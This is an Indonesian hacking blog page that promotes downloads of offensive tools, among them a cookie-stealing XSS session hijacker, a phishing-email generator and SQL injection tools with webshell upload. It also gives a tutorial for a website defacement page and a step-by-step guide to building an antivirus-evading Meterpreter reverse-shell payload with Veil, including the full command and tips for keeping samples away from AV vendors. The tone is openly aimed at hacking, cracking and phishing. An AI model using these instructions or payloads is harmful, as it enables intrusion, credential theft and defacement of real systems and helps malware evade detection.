Diberdayakan oleh Blogger.
RSS
01.39 | Label:

10 [RIPS] A STATIC SOURCE CODE ANALYSER PHP


RIPS adalah tools yang dibuat menggunakan PHP untuk menemukan kelemahan pada aplikasi yang berbasis PHP dengan metode static code analysis.
Fitur-fitur yang tersedia:
  • Code Execution
  • Command Execution
  • Cross-Site Scripting
  • Header Injection
  • File Disclosure
  • File Inclusion
  • File Manipulation
  • LDAP Injection
  • SQL Injection
  • Unserialize with POP
  • XPath Injection
  • … other
Code audit interface
  • scan and vulnerability statistics
  • grouped vulnerable code lines (bottom up or top down)
  • vulnerability description with example code, PoC, patch
  • exploit creator
  • file list and graph (connected by includes)
  • function list and graph (connected by calls)
  • userinput list (application parameters)
  • source code viewer with highlighting
  • active jumping between function calls
  • search through code by regular expression
  • 8 syntax highlighting designs
  • … much more
Static code analysis
  • fast
  • tokenizing with PHP tokenizer extension
  • taint analysis for 232 sensitive sinks
  • inter- and intraprocedural analysis
  • handles very PHP-specific behaviour
  • handles user-defined securing
  • reconstruct file inclusions
  • detect blind/non-blind exploitation
  • detect backdoors
  • 5 verbosity levels
  • over 100 testcases
  • … much more
Download RIPS
Anonymous Hacking Cracking Tools 2013 - 2014
Selamat mempelajari, mencoba dan menggunakan. Gunakanlah sesuai dengan sebaik-baiknya dan sesuai kebutuhan :)
Sekian dulu posting dari saya,, semoga bermanfaat.
wassalamm....

Kunjungi terus Blog saya untuk mendapatkan teknik-teknik hackingdefacetips dan tricksserta software-software terbaru yang akan saya posting berikutnya. karna setiap harinya Blog ini selalu saya update.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.39 | Label:

. [DROIDSQLI] MYSQL INJECTION TOOL FOR ANDROID

DroidSQLi adalah untuk melakukan SQL injecttion dengan menggunakan perangkat Android.



Fitur-fitur yang tersedia DroidSQLi:
- Time based injection
- Blind injection
- Error based injection
– Normal injection
Download DroidSQLi
Anonymous Hacking Cracking Tools 2013 - 2014

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.38 | Label:

8. [RAFT V3.0.1] RESPONSE ANALYSIS AND FURTHER TESTING TOOL



RAFT adalah testing tool untuk mengidentifikasi kelemahan terhadap aplikasi web.
RAFT bisa digunakan untuk fuzzing.
Download Raft v3.0.1
Anonymous Hacking Cracking Tools 2013 - 2014

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.38 | Label:

7. [RESOLVER V1.0.9] THE REVERSE/BRUTEFORCE DNS LOOKUP


Fitur-fitur yang tersedia:
  • Resolve a Single IP
  • Resolve an IP Range
  • Resolve IP’s provided in a text file
  • Export Results to a text file
  • Copy results to Clipboard
  • DNS Records brute force

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.37 | Label:

6. [COOKIECATCHER] SESSION HIJACKING TOOL

Fitur-fitur yang tersedia:
- Prebuilt payloads to steal cookie data
- Just copy and paste payload into a XSS vulnerability
- Will send email notification when new cookies are stolen
- Will attempt to refresh cookies every 3 minutes to avoid inactivity timeouts
- Provides full HTTP requests to hijack sessions through a proxy (BuRP, etc)
- Will attempt to load a preview when viewing the cookie data
- PAYLOADS
- Basic AJAX Attack
- HTTPONLY evasion for Apache CVE-20120053
- More to come

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.37 | Label:

5. [SPEARPHISHER] A SIMPLE PHISHING EMAIL GENERATION TOOL

SpearPhisher adalah sebuah tools yang digunakan untuk menyebarkan halaman phising. Tools ini sangat mudah digunakan dan sangat powerfull untuk kegiatan phising.
Fitur-Fitur yang tersedia:
  • The tool supports specifying different sending names and email addresses, multiple recipients via TO, CC, BCC, and allows bulk loading with one recipient email address per line in a file.
  • It allows customization of the subject, adding one attachment, and SSL support for SMTP enabled mail servers. One of the popular features with our client is the WYSIWYG HTML editor that allows virtually anyone to use the tool; previewing results as you point and click edit your malicious email body.
  • If you want to add custom XSS exploits, client side attacks, or other payloads such as a Java Applet code generated by the Social Engineer Toolkit (SET), its split screen editor allows more advanced users to edit HTML directly.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.36 | Label:

4. [JSQL INJECTION V0.5] JAVA TOOL FOR AUTOMATIC DATABASE INJECTION


jSQL Injection adalah aplikasi yang ringan untuk mendapatkan informasi database dan mengexploitasi database.
jSQL free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris).
Fitur- Fitur jSQL Injection – Versi 0.5:
  • SQL shell
  • Uploader
  • Admin page checker and preview
  • Brute forcer (md5 mysql)
  • Coder (encode decode base64 hex md5)

  • Distant file reading
  • Webshell deposit
  • Terminal for webshell commands
  • Configuration backup
  • Update checker

  • Time based algorithm
  • Multi-thread control (start/pause/resume/stop)
  • Shows URL calls

  • GET, POST, header, cookie methods
  • Normal, error based, blind algorithms
  • Automatic best algorithm selection
  • Progression bars
  • Simple evasion
  • Proxy setting
  • Supports MySQL

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.36 | Label:

3. [WHATWEB V0.4.7] CMS TECHNOLOGY SCANNER


WhatWeb digunakan untuk mengidentifikasi websites. Tujuannya adalah untuk menjawab pertanyaan, “What is that Website?”. Detail website akan diberikan sesuai dengan kebutuhan. Biasanya digunakan untuk Content Management System seperti “WordPress, Joomla, dsb”.
Fitur-fitur yang tersedia:
* Over 900 plugins
* Control the trade off between speed/stealth and reliability
* Plugins include example URLs
* Performance tuning. Control how many websites to scan concurrently.
* Multiple log formats: Brief (greppable), Verbose (human readable), XML, JSON, MagicTree, RubyObject, MongoDB.
* Recursive web spidering
* Proxy support including TOR
* Custom HTTP headers
* Basic HTTP authentication
* Control over webpage redirection
* Nmap-style IP ranges
* Fuzzy matching
* Result certainty awareness
* Custom plugins defined on the command line

Contoh penggunaan:

Check beberapa website:

Menggunakan fitur untuk mencari informasi yang lebih detail.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.36 | Label:

2. [ARACHNI V0.4.5.1-0.4.2] OPEN SOURCE WEB APPSEC SCANNER

Arachni adalah aplikasi gratis (Open Source project) untuk mencari kelemahan dan mendukung keamanan aplikasi, release code dibawah Apache License Version 2.0 dan kita semua gratis menggunakannya.

Fitur-Fitur dan Perubahan yang tersedia:

  • Optimized pattern matching to use less resources by grouping patterns to only be matched against the per-platform payloads. Bottom line, pattern matching operations have been greatly reduced overall andvulnerabilities can be used to fingerprint the remote platform.
  • Modules
    • Path traversal ( path_traversal)
      • Updated to use more generic signatures.
      • Added dot-truncation for MS Windows payloads.
      • Moved non-traversal payloads to the file_inclusion module.
    • File inclusion ( file_inclusion) — Extracted from path_traversal.
      • Uses common server-side files and errors to identify issues.
    • SQL Injection ( sqli) — Added support for the following databases:
      • Firebird
      • SAP Max DB
      • Sybase
      • Frontbase
      • IngresDB
      • HSQLDB
      • MS Access
    • localstart_asp — Checks if localstart.asp is accessible.
  • Plugins — Added:
    • Uncommon headers ( uncommon_headers) — Logs uncommon headers.

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.35 | Label:

Free Anonymous Hacking Tools 2013 – 2014
Hacking Cracking Phising Tools 2013 - 2014Berikut ini kita berbagi Peralatan / Tools yang biasanya dipakai oleh pentester, hacker, cracker, phiser dan bahkan Anonymous. Anonymous Hacking Tools 2013 – 2014, Anonymous Cracking Tools 2013 -2014. Download Hacking Tools 2013 – 2014, Phising Tools 2013 – 2014, Hacking Tools 2013 – 2014, Tools Hacking 2013 – 2014, Cracking Tools 2013 – 2014, Tools Cracking 2013 – 2014, Tool Hack 2013 – 2014, Tool Crack 2013 – 2014, Tool Hacking 2013 – 2014, Tool Cracking 2013 – 2014, Tool Hacker 2013 – 2014,Tool Cracker 2013 – 2014, Tools Hacker 2013 – 2014, Tools Cracker 2013 – 2014 yang mungkin bisa bermanfaat untuk bisa anda pakai di 2013 – 2014.
Ayo Download Hacking Tools 2013 – 2014 – Hacker Tools 2013 – 2014 – Hack Tool 2013 – 2014 – Hacker Tool 2013 – 2014 – Hacking Tool 2013 – 2014 – Hack Tool 2013 – 2014 – Cracking Tools 2013 – 2014 – Cracker Tools 2013 – 2014 – Cracking Tool 2013 – 2014 – Cracker Tool 2013 – 2014 – Crack Tools 2013 – 2014 – Crack Tool 2013 – 2014.
Happy Hacking & Cracking All:

1. [JBRUTE V0.9.4] OPEN SOURCE SECURITY TOOL

JBrute adalah aplikasi open source yang ditulis menggunakan Java untuk mengaudit keamanan dan password yang disimpan didalam system, bisa digunakan untuk aplikasi open source dan aplikasi komersial. Difokuskan untuk menyediakan dukungan multi-platform dan parameter fleksibel untuk kebutuhan skenario pengecekan.
Requirement: Java Runtime version 1.7 or higher.

Fitur-fitur yang tersedia:


  • Muli-platform support (by Java VM)
  • Several hashing algorithms supported
  • Flexible chained hashes decryption (like MD5(SHA1(MD5())))
  • Both brute force and dictionary decryption methods supported
  • Build-In rule pre-processor for dictionary decryption
  • Multi-threading support for brute force decryption
Supported algorithms:
  • MD5
  • MD4
  • SHA-256
  • SHA-512
  • MD5CRYPT
  • SHA1
  • ORACLE-10G
  • ORACLE-11G
  • NTLM
  • LM
  • MSSQL-2000
  • MSSQL-2005
  • MSSQL-2012
  • MYSQL-322
  • MYSQL-411
  • POSTGRESQL
  • SYBASE-ASE1502

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.34 | Label:



SKRIP HACK DEFANCE

 
<HTML>
<head>
[kode HTML]
</head>
<body>
[Kode HTML]
</body>
</HTML>

Kita coba membuat title/judul halaman deface dan isi.
Perhatikan saja script sederhana berikut.
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
Just simple script by nabilaholic
</body>
</HTML>

Simpan dengan format .html . Sebagai contoh saya simpan dengan nama hacked.html . Coba buka menggunakan firefox/chrome sobat.


Sip, langkah awal sudah berhasil.
Tahap kedua, kita coba untuk mengatur warna, besar huruf dan menengahkan huruf.
Simak saja scriptnya :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body>
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>

Untuk font color bisa diganti dengan green, blue dll. Begitu juga dengan font size. Ini hasilnya :

Tahap ketiga, kita coba memberi warna background pada script HTML.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
</body>
</HTML>
Tinggal menambahkan BGCOLOR di samping kode <body dan sebelum tanda tutp [>]
Save dan lihat hasilnya.

Tahap membuat script HTML bagi pemula sudah hampir selesai. Sekarang kita coba untuk menambah gambar pada script HTML kita.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzDuzsAN9n8BEoE_uS5uiKg6q6Q7sUgf8j1HKsulHVwz5FTODUUk97PqCY4YiotfTskYoI_zmfxhGS3nlg5a21NkHXoxShuKNTf7rm0htHbNHy0u8ndTrD7IHat0pE0ymTlVdZ14JFoca2/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

URL gambar yang saya beri warna biru bisa kalian ganti sendiri. Begitu juga dengan width dan height. Untuk gambarnya bisa cari di google atau upload di hosting upload gambar . Ex : google picasa, photobucket, dll.

Sekarang,kita coba tambahkan meta tag di komponen HEAD. Apa sih fungsi meta tag ?
Untuk member description dan keyword di hasil pencarian google. Mungkin kalau dijelaskan dengan kata-kata sulit, coba lihat saja gambar berikut.
Kata yang saya beri tanda merah, itulah yang disebut META DESCRIPTION.
Lihat script berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6>Just simple script by nabilaholic</FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzDuzsAN9n8BEoE_uS5uiKg6q6Q7sUgf8j1HKsulHVwz5FTODUUk97PqCY4YiotfTskYoI_zmfxhGS3nlg5a21NkHXoxShuKNTf7rm0htHbNHy0u8ndTrD7IHat0pE0ymTlVdZ14JFoca2/s1600/heavyrotation.jpg" width="860" height="264""><center>
</body>
</HTML>

Sebenarnya masih banyak meta tag seperti meta keyword, robots, title , dll. Namun karena ini adalah tahap perkenalan, pasang yang penting saja dulu. Yaitu meta description.

Selanjutnya, kita coba sedikit menghias script kita dengan tulisan berjalan [marquee] dan berkedip [blink].
Lihat saja kode berikut :
<HTML>
<head>
<title>HACKED BY NABILAHOLIC</title>
<meta name="description" content="You Got Hacked by Nabilaholic ? Where the security !" />
</head>
<body BGCOLOR="black">
<center><FONT COLOR="red"><FONT SIZE=6><blink>Just simple script by nabilaholic</blink></FONT></FONT></center>
<center><img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgzDuzsAN9n8BEoE_uS5uiKg6q6Q7sUgf8j1HKsulHVwz5FTODUUk97PqCY4YiotfTskYoI_zmfxhGS3nlg5a21NkHXoxShuKNTf7rm0htHbNHy0u8ndTrD7IHat0pE0ymTlVdZ14JFoca2/s1600/heavyrotation.jpg" width="860" height="264""><center>
<center><FONT COLOR="red"><FONT SIZE=6><marquee>Just simple script by nabilaholic</marquee></FONT></FONT></center>
</body>
</HTML>

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
01.30 | Label:

Cara Hack: Bypass Antivirus menggunakan Veil di Kali Linux

yang dikembangkan oleh Chris Truncer @ ChrisTruncer, Mike Wright @ TheMightyShiv dan The Grayhound @ the_grayhound khusus dirancang untuk Kali Linux dengan tujuan:

  • Bypass solusi AV yang umum digunakan.
  • Dapatkan muatan dari kerangka Metasploit, dan mendapatkan yang baru di rilis Metasploit masa depan.
  • Cobalah untuk membuat setiap payload sebagai random mungkin.
Saya ingin berbicara tentang Veil dan memberikan beberapa contoh tentang bagaimana untuk memotong beberapa anti-virus.
Perubahan utama dalam versi terbaru adalah:
  • kompatibilitas x64 - Mereka telah diperbarui skrip pengaturan mereka untuk membuat Veil kompatibel dengan x86 dan x64 versi.
  • Fitur Update - Sekarang Veil memiliki fungsi update. Sekarang kita dapat memperbarui Veil baik baris perintah atau menu.
Jika Anda ingin menginstal Veil dalam lingkungan apa pun yang Anda inginkan, Anda dapat menggunakan perintah di bawah ini:
wget https://github.com/ChrisTruncer/Veil/archive/master.zip
master.zip unzip
cd Veil-master/setup
cd ..
. / Setup.sh

Jika Anda ingin bekerja dengan Kali Linux , dengan perintah di bawah ini akan cukup.
apt-get Update
apt-get install veil
Saya punya pengalaman buruk dengan pilihan kedua dan saya lebih memilih untuk menginstal Veil dengan yang pertama menggunakan "setup.sh" script.
Pengembang Veil yang tidak ingin menyerahkan payload apapun untuk www.virustotal.com untuk menghindari distribusi ke vendor anti-virus . 
Ada alternatif: vscan.novirusthanks.org . Situs yang memindai file yang mencurigakan untuk deteksi malware dan menawarkan kita pilihan: "Do not distribute the samplel".
Ketika Veil telah terinstal, jalankan dengan perintah di bawah ini:
. / Veil

Secara default di Kali Linux, kita dapat melihat 18 muatan siap untuk digunakan. Sekarang kita dapat mengetik "use".

Di sini, Kerudung menawarkan kita informasi lebih lanjut tentang muatan. Dalam hal ini saya memilih python/b64VirtualAlloc mengetik " 18 "
Ketika payload kita dimuat, ketik " generate ". Anda dapat mengatur beberapa opsi spesifik, tapi dalam posting ini, kita akan mencoba opsi default.
Sekarang kita akan memilih msfvenom dengan mengetik " 1 "
Setelah itu, kita perlu mengetikkan beberapa rincian:
  • Masukkan metasploit payload: windows/meterpreter/reverse_tcp
  • Masukkan nilai untuk 'LHOST', [ tab ] untuk IP lokal: "192.168.69.69"
  • Masukkan nilai untuk 'LPORT': " 443 "
Maka itu perlu untuk menunggu sementara shellcode yang telah dihasilkan.
Anda harus tekan enter dan kemudian Veil meminta nama payload kami. Dalam hal ini undetectable” (atau apa pun yang Anda inginkan)
Kita akan menggunakan PyInstaller. Ini akan membuat exe diinstal.. Untuk ini, kita akan mengetik " 1 "
Pada akhirnya, kita bisa mendapatkan executable kami di /root/Veil-master/output/compiled/
Sekarang, kami memiliki executable kami dan kami akan mengirimkannya ke vscan.novirusthanks.org . Silahkan, ingat untuk memeriksa Do not distribute the sample“. Jika Anda memilih untuk tidak memeriksa opsi ini atau Anda memutuskan untuk mengirimkan executable untuk www.virustotal.com file Anda akan diselidiki dan mungkin itu akan diakui oleh beberapa vendor anti-virus.
Anda dapat melihat pada gambar di bawah salah satu vendor anti-virus mendeteksi file kita sebagai berbahaya. Kami sudah mendapat deteksi tingkat 0%!!
Jika Anda memilih untuk menggunakan CLI bukan menu, Anda dapat menghasilkan muatan yang sama kita buat dengan perintah di bawah ini.
./Veil.py -l python -p b64VirtualAlloc -o undetectable –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.69.69 LPORT=443
Sekian tutorial dari saya, semoga bermanfaat. :))
Terus kunjungi Blog ini, untuk selanjutnya saya akan share beberapa trick dan tutorial tentang Hacking. wasslam....

 

  • Digg
  • Del.icio.us
  • StumbleUpon
  • Reddit
  • RSS
Read User's Comments0
Diposting oleh Unknown
Langganan: Postingan (Atom)